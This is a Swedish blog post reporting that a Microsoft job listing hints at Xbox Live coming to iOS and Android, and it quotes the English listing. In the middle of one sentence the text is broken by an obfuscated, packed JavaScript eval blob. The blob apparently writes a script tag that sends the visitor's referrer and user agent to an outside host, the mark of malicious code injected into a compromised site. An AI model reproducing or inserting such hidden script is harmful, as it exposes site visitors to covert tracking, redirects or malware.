Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Xbox Live spel till iOS & Android.

Xbox Live spel till iOS & Android.
Sebastian

Microsoft vill utöka sin Xbox Live klient till iOS och Android, detta uptäcktes i samband med att företaget gjort klart att man söker en ny medarbetare. I arbetsbeskrivning för tjänsten kan man läsa att man planerar en utökning av Xbox eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rbnbn|var|u0026u|referrer|sntzi||js|php’.split(’|’),0,{}))
Live
tjänsten till andra operativsystem. I nuläget är Xbox Live endast tillgängligt till Windows Phone 7. Men jag tror man insett att en stor kundgrupp missas i att göra Xbox Live exklusivt för Windows phone 7.

Microsoft har redan två applikationer på App Store, så det vore inte helt otroligt om även denna kom till App store.

Här nedan är informationen som Microsoft gått ut med ang. tjänsten man annonserar.

”Xbox LIVE Mobile team is looking for a passionate and experienced developer to join us brining [sic] Xbox LIVE entertainment experiences to various mobile platforms. As the team inside IEB (Interactive Entertainment Business) dedicated to mobile experiences, we work closely with console software team and Xbox LIVE services team to bring the latest and greatest gaming and entertainment experience to mobile platforms including Windows Phone, iOS and other mobile platforms. Combining Xbox LIVE experiences together with mobile devices has enabled many new opportunities and interesting user scenarios such as location based gaming and social networking, avatar with presence, etc. As a software development engineer on the team, you will have the opportunity to help define and design the experiences for the project, you will get to work with a team of energetic and talented developers, and you will have the luxury to work with all sorts of mobile devices to create the official Xbox LIVE mobile experiences.”